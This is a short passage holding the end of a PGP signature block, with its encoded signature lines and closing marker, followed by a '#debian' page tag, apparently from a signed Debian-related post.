g6FyeqWsGh9QG/CPYeMN7LB7lW1l2XzO6GQ9QR1rzU/whgUVxprkye5wx2BaQmom  
rrWVHBijH1cNWd1IbryAm+prduL1l/CNR0785ZPTjB3SsMFPCAtRHf9G976rqVs0  
P3jGg+BdeDj+sd3EFHcHnNXQOaETgR07RWzngbjEkgmJYhB2B43hCQ2LwsNlHsmg  
O6otUI2k274IF9KHh0T1h1hopbUTU8VPy3dpcLloCzk7KiAv1RI=  
=4ExT  
-----END PGP SIGNATURE-----

Tag

#debian